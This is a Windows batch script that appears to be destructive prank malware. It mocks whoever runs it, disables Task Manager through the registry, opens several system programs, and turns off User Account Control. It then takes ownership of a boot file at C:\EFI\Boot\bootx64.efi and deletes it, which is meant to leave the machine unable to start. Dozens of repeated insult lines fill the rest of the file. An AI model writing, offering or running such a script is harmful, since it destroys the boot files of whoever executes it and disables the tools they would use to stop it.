@echo "Why the fuck would you open this you absolute buffoon your pc will not be happy with you AT ALL. Also dont even try to task manager your way out of this because i have disabled it :)"
timeout -t 9 NOBREAK > nul
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
start msedge.exe
start Control Panel
start explorer.exe
start powershell.exe
start cmd
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
%windir%\EFI\cmd.exe /k %windir%\EFI\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
takeown /f "C:\EFI\Boot\bootx64.efi" /r /d y
icacls C:\EFI\Boot\bootx64.efi /grant administrators:F /t
del /f /q "C:\EFI\Boot\bootx64.efi"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
@echo "YOU ABSOLUTE BUFFOON"
